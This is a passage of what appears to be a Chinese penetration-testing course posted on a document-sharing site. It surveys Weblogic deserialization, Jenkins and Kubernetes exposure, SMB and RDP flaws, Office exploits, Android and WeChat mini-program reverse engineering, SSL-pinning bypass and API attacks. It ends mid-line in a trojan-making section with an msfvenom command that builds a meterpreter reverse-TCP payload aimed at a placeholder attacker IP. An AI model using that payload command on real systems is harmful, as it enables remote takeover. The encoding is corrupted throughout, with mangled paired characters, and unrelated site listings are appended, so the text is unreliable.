3協(xié)議用于集群通信,存在多個(gè)反序列化漏洞(CVE-2015-4852、CVE-2018-2628等)。攻擊者向7001端口發(fā)送構(gòu)造的序列化對(duì)象,觸發(fā)代碼執(zhí)行。利用工具:WeblogicScan、JRMPClient。防御:禁用T3協(xié)議、升級(jí)補(bǔ)丁、部署Weblogic安全加固方案。Jenkins與K8s容器安全Jenkins攻擊面未授權(quán)訪問(wèn):默認(rèn)安裝未啟用認(rèn)證,可直接創(chuàng)建任務(wù)執(zhí)行命令Groovy腳本:ScriptConsole可執(zhí)行任意代碼反序列化:CLI接口存在多個(gè)RCE漏洞插件漏洞:Git、Pipeline等插件歷史漏洞多Kubernetes安全APIServer暴露:6443端口未授權(quán)可控制集群Dashboard弱認(rèn)證:Token泄露或跳過(guò)認(rèn)證容器逃逸:特權(quán)容器、掛載宿主機(jī)目錄Etcd數(shù)據(jù)泄露:2379端口存儲(chǔ)敏感配置端口協(xié)議與桌面應(yīng)用安全常見網(wǎng)絡(luò)服務(wù)漏洞掃描SSH服務(wù)(22端口)弱口令爆破、私鑰泄露、用戶枚舉、已知漏洞利用。防御:禁用root登錄、使用密鑰認(rèn)證、fail2ban防爆破、修改默認(rèn)端口。RDP遠(yuǎn)程桌面(3389端口)BlueKeep漏洞(CVE-2019-0708)、弱密碼登錄、會(huì)話劫持。WindowsServer2003-2008系統(tǒng)高危,需及時(shí)打補(bǔ)丁。FTP服務(wù)(21端口)匿名訪問(wèn)、目錄遍歷、未加密傳輸??赡艽嬖赑roFTPD、vsFTPd的歷史RCE漏洞,建議使用SFTP替代。SMB文件共享(445端口)永恒之藍(lán)(MS17-010)、空會(huì)話枚舉用戶、IPC$未授權(quán)訪問(wèn)。勒索病毒主要傳播途徑,高危端口需防火墻封禁。桌面應(yīng)用RCE攻擊技術(shù)辦公軟件漏洞MicrosoftOffice:公式編輯器漏洞(CVE-2017-11882)、宏病毒、DDE攻擊、OLE對(duì)象利用。通過(guò)釣魚郵件傳播惡意文檔。WPSOffice:加載項(xiàng)劫持、模板注入、歷史版本存在任意代碼執(zhí)行漏洞。中文用戶基數(shù)大,APT常用攻擊目標(biāo)。即時(shí)通訊工具QQ/微信:接收文件自動(dòng)執(zhí)行、協(xié)議解析漏洞、圖片渲染RCE。釘釘/企業(yè)微信:企業(yè)環(huán)境中橫向移動(dòng)的跳板,可能存在第三方插件漏洞。防御建議:禁止陌生人文件、關(guān)閉自動(dòng)預(yù)覽、定期更新客戶端版本。第六章:移動(dòng)端與API安全移動(dòng)互聯(lián)網(wǎng)時(shí)代的新戰(zhàn)場(chǎng)隨著移動(dòng)應(yīng)用和微服務(wù)架構(gòu)的普及,移動(dòng)端與API安全成為新的攻防焦點(diǎn)。本章深入剖析Android/iOS應(yīng)用的逆向分析技術(shù)、微信小程序的安全隱患,以及RESTfulAPI的常見漏洞。我們將學(xué)習(xí)Frida動(dòng)態(tài)插樁、證書繞過(guò)、算法還原等移動(dòng)安全核心技能,掌握API接口的鑒權(quán)繞過(guò)、參數(shù)污染、越權(quán)訪問(wèn)等攻擊手法。這些知識(shí)對(duì)于移動(dòng)應(yīng)用開發(fā)者和安全測(cè)試人員都至關(guān)重要。APP逆向與安全防護(hù)Android應(yīng)用逆向分析流程APK解包與反編譯使用apktool解包APK獲取資源文件和smali代碼,jadx反編譯dex為Java代碼。查看AndroidManifest.xml分析組件、權(quán)限、入口Activity。加固與脫殼商業(yè)應(yīng)用常使用360、梆梆、愛加密等加固方案保護(hù)代碼。需使用FRIDA-DEXDump、Dumpdex等工具從內(nèi)存dump原始dex,或利用脫殼機(jī)。關(guān)鍵邏輯定位搜索關(guān)鍵字符串(如"登錄成功"、"加密")定位代碼位置,追蹤native方法調(diào)用,使用IDAPro分析so庫(kù)中的算法實(shí)現(xiàn)。動(dòng)態(tài)調(diào)試與Hook使用AndroidStudio+debuggable應(yīng)用調(diào)試,或通過(guò)Frida/Xposedhook關(guān)鍵函數(shù),打印參數(shù)、修改返回值、繞過(guò)校驗(yàn)邏輯。Frida與XposedHook技術(shù)Frida動(dòng)態(tài)插樁Frida是跨平臺(tái)的動(dòng)態(tài)插樁框架,通過(guò)JavaScript注入進(jìn)程,無(wú)需重新打包應(yīng)用。可HookJava層、Native層、SSLPinning等。常用場(chǎng)景:Hook登錄驗(yàn)證函數(shù)修改返回值打印加密參數(shù)分析算法繞過(guò)Root檢測(cè)和模擬器檢測(cè)導(dǎo)出內(nèi)存中的密鑰和敏感數(shù)據(jù)Xposed框架基于重打包的Hook方案,需要root權(quán)限??尚薷腁ndroid系統(tǒng)行為,劫持任意應(yīng)用的方法調(diào)用。實(shí)用模塊:JustTrustMe:繞過(guò)SSL證書校驗(yàn)SSLUnpinning:通用證書解綁VirtualXposed:無(wú)需root運(yùn)行EdXposed:支持高版本Android證書校驗(yàn)繞過(guò)與反代理防御應(yīng)用通過(guò)SSLPinning(證書鎖定)防止中間人攻擊和抓包分析。攻擊者可通過(guò)反編譯修改校驗(yàn)代碼、FridaHook證書校驗(yàn)函數(shù)、修改系統(tǒng)證書庫(kù)等方式繞過(guò)。高級(jí)應(yīng)用還會(huì)檢測(cè)VPN、代理、調(diào)試器、Frida、Xposed等工具,通過(guò)多點(diǎn)校驗(yàn)、服務(wù)端校驗(yàn)、完整性檢測(cè)構(gòu)建縱深防御體系。微信小程序安全小程序解包與反編譯微信小程序本質(zhì)是運(yùn)行在微信容器中的前端應(yīng)用,代碼存儲(chǔ)在手機(jī)本地,可通過(guò)以下步驟獲取源碼:1提取wxapkg包從/data/data/com.tencent.mm/MicroMsg/{user}/appbrand/pkg/目錄找到.wxapkg文件2解包工具使用unveilr、wxappUnpacker等工具解密解包,還原出wxml、wxss、js文件3代碼分析查看app.js入口、頁(yè)面邏輯、API調(diào)用,尋找硬編碼密鑰、接口地址、邏輯漏洞小程序常見安全問(wèn)題敏感信息泄露源碼中硬編碼AppKey、AppSecret、數(shù)據(jù)庫(kù)連接串、第三方API密鑰。應(yīng)使用服務(wù)端配置管理,前端只獲取臨時(shí)憑證。未授權(quán)訪問(wèn)云開發(fā)數(shù)據(jù)庫(kù)權(quán)限配置為所有用戶可讀寫,導(dǎo)致數(shù)據(jù)泄露或篡改。需配置精細(xì)的權(quán)限規(guī)則,驗(yàn)證用戶身份。業(yè)務(wù)邏輯繞過(guò)前端校驗(yàn)可通過(guò)修改代碼繞過(guò),如支付金額、會(huì)員權(quán)限判斷。關(guān)鍵校驗(yàn)必須在服務(wù)端完成。數(shù)據(jù)抓包分析使用Charles、Fiddler配置代理抓取小程序HTTPS請(qǐng)求,分析接口參數(shù)、鑒權(quán)方式、加密算法。主包分包與算法逆向小程序有2MB主包大小限制,超過(guò)部分會(huì)打包為分包(subpackage)。逆向時(shí)需要獲取所有分包才能看到完整代碼。算法逆向重點(diǎn)關(guān)注wx.request的參數(shù)生成邏輯,常見的sign簽名、timestamp時(shí)間戳、nonce隨機(jī)數(shù)等防重放機(jī)制。開發(fā)建議:小程序代碼是公開的,不要在前端實(shí)現(xiàn)關(guān)鍵業(yè)務(wù)邏輯。使用云函數(shù)處理敏感操作,對(duì)API接口做嚴(yán)格的鑒權(quán)和參數(shù)校驗(yàn),采用HTTPS加密傳輸。API接口安全攻防RESTful與SOAP接口差異RESTfulAPI基于HTTP協(xié)議的輕量級(jí)接口,使用JSON格式傳輸數(shù)據(jù)。通過(guò)URL路徑和HTTP方法(GET/POST/PUT/DELETE)表達(dá)資源操作。安全要點(diǎn):使用JWT或OAuth2進(jìn)行鑒權(quán)參數(shù)簽名防止篡改限制請(qǐng)求頻率防止暴力破解避免在URL中暴露敏感信息SOAPAPI基于XML的企業(yè)級(jí)接口協(xié)議,結(jié)構(gòu)嚴(yán)格,支持WSDL服務(wù)描述。常用于銀行、政府等傳統(tǒng)系統(tǒng)。安全要點(diǎn):WS-Security標(biāo)準(zhǔn)加密和簽名防止XML外部實(shí)體注入(XXE)WSDL泄露可能暴露接口細(xì)節(jié)SOAP消息體可能存在注入漏洞API常見漏洞與檢測(cè)方法鑒權(quán)繞過(guò)JWT密鑰爆破、alg:none繞過(guò)、過(guò)期時(shí)間未校驗(yàn)、Token在URL中泄露。使用Burp的JSONWebToken插件自動(dòng)化測(cè)試JWT漏洞。越權(quán)訪問(wèn)修改用戶ID、訂單號(hào)等參數(shù)訪問(wèn)他人數(shù)據(jù)。自動(dòng)化工具Autorize可批量測(cè)試不同權(quán)限賬號(hào)的API訪問(wèn)權(quán)限。批量賦值攻擊POST請(qǐng)求中添加未公開的參數(shù)(如isAdmin:true)嘗試提權(quán)。需要結(jié)合源碼或模糊測(cè)試發(fā)現(xiàn)隱藏字段。阿里云KEY泄露與利用開發(fā)者誤將阿里云AccessKey提交到GitHub等公開倉(cāng)庫(kù),攻擊者可利用該憑證訪問(wèn)云服務(wù)資源。泄露的Key可能擁有ECS、RDS、OSS等服務(wù)的操作權(quán)限,導(dǎo)致數(shù)據(jù)泄露、資源濫用、挖礦等后果。防御措施:使用RAM子賬號(hào)最小權(quán)限原則、啟用MFA多因素認(rèn)證、定期輪換密鑰、配置Git防泄露工具(如git-secrets)、使用臨時(shí)STS令牌替代長(zhǎng)期密鑰。第七章:實(shí)戰(zhàn)工具與攻防演練工欲善其事,必先利其器滲透測(cè)試的效率很大程度取決于工具的熟練使用。本章介紹KaliLinux滲透測(cè)試平臺(tái)及其核心工具集,包括信息收集、漏洞掃描、漏洞利用、權(quán)限維持等各環(huán)節(jié)的專業(yè)工具。我們還將講解紅藍(lán)對(duì)抗演練的流程與思路,藍(lán)隊(duì)如何部署防御體系,紅隊(duì)如何繞過(guò)檢測(cè),以及應(yīng)急響應(yīng)中的日志分析、溯源取證技術(shù)。這些實(shí)戰(zhàn)經(jīng)驗(yàn)將幫助你建立完整的攻防知識(shí)體系。KaliLinux基礎(chǔ)與滲透工具KaliLinux核心工具集Nmap網(wǎng)絡(luò)掃描端口掃描、服務(wù)識(shí)別、操作系統(tǒng)指紋。常用命令:nmap-sV-sC-Otarget進(jìn)行全面掃描。支持NSE腳本擴(kuò)展漏洞檢測(cè)。Metasploit滲透框架集成數(shù)千個(gè)漏洞利用模塊,可生成木馬、權(quán)限維持、橫向移動(dòng)。msfconsole命令行界面功能強(qiáng)大,支持自定義模塊開發(fā)。SQLmap注入工具自動(dòng)化SQL注入檢測(cè)與利用,支持多種數(shù)據(jù)庫(kù)和注入類型。命令示例:sqlmap-u"url"--batch--dbs自動(dòng)獲取數(shù)據(jù)庫(kù)列表。BurpSuite代理Web滲透測(cè)試必備工具,攔截修改HTTP請(qǐng)求,自動(dòng)化掃描漏洞,重放攻擊,插件生態(tài)豐富。專業(yè)版功能更強(qiáng)大。Hashcat密碼破解GPU加速的密碼恢復(fù)工具,支持上百種哈希算法。配合字典和掩碼攻擊可高效破解密碼。Aircrack-ng無(wú)線WiFi安全審計(jì)套件,可抓取握手包、破解WPA/WEP、偽造AP釣魚。需配合支持監(jiān)聽模式的無(wú)線網(wǎng)卡。木馬制作與釣魚攻擊Msfvenom木馬生成使用Metasploit的載荷生成器創(chuàng)建木馬:msfvenom-pwindows/meterpreter/reverse_tcpLHOST=攻擊機(jī)IPLPORT=4444-fex
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 2026年江蘇財(cái)經(jīng)職業(yè)技術(shù)學(xué)院?jiǎn)握新殬I(yè)適應(yīng)性考試題庫(kù)帶答案詳解
- 2026年浙江建設(shè)職業(yè)技術(shù)學(xué)院?jiǎn)握新殬I(yè)技能測(cè)試題庫(kù)及完整答案詳解1套
- 2026年正德職業(yè)技術(shù)學(xué)院?jiǎn)握新殬I(yè)適應(yīng)性測(cè)試題庫(kù)含答案詳解
- 2026年貴州文化旅游職業(yè)學(xué)院?jiǎn)握新殬I(yè)適應(yīng)性考試題庫(kù)含答案詳解
- 2026年浙江汽車職業(yè)技術(shù)學(xué)院?jiǎn)握芯C合素質(zhì)考試題庫(kù)及答案詳解一套
- 2026年長(zhǎng)春早期教育職業(yè)學(xué)院?jiǎn)握新殬I(yè)技能考試題庫(kù)及參考答案詳解一套
- 2026年駐馬店幼兒師范高等專科學(xué)校單招職業(yè)傾向性考試題庫(kù)及參考答案詳解一套
- 2025年鄂州市華容區(qū)屬國(guó)有企業(yè)面向社會(huì)公開招聘工作人員備考題庫(kù)完整答案詳解
- 【歷 史】2025-2026學(xué)年七年級(jí)上冊(cè)地圖信息合集課件
- 2025年楚雄市愛昕健康養(yǎng)老產(chǎn)業(yè)有限公司招聘?jìng)淇碱}庫(kù)及一套答案詳解
- 屋面防水施工勞務(wù)合同
- 《高中物理電磁學(xué)復(fù)習(xí)課件》
- DB33-T 768.13-2024 安全技術(shù)防范系統(tǒng)建設(shè)技術(shù)規(guī)范 第13部分:娛樂(lè)場(chǎng)所
- 金融機(jī)構(gòu)安全操作培訓(xùn)
- 月子中心客服培訓(xùn)
- 2025年個(gè)人所得稅贍養(yǎng)老人分?jǐn)倕f(xié)議范本下載8篇
- 中級(jí)微觀經(jīng)濟(jì)學(xué)知到智慧樹章節(jié)測(cè)試課后答案2024年秋對(duì)外經(jīng)濟(jì)貿(mào)易大學(xué)
- 2023年民航華北空管局招聘筆試真題
- 蘭州市離婚協(xié)議書模板
- DB51∕2672-2020 成都市鍋爐大氣污染物排放標(biāo)準(zhǔn)
- 《山東省建筑工程消耗量定額》解釋全集
評(píng)論
0/150
提交評(píng)論